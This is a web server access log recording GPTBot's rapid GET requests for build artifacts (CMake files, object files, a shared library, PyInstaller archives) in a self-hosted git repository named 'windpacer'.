"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9986] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44566] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44564] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44564] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:15:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11622] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69286] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17081] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:15:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39472] [Gzip 31.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39477] [Gzip 31.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39474] [Gzip 31.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 97716] [Gzip 28.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:15:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:15:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 70873] [Gzip 17.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13547] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" -[17/Feb/2026:15:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13497] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11622] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44100] [Gzip 15.60] [Sent-to 192.168.0.250] 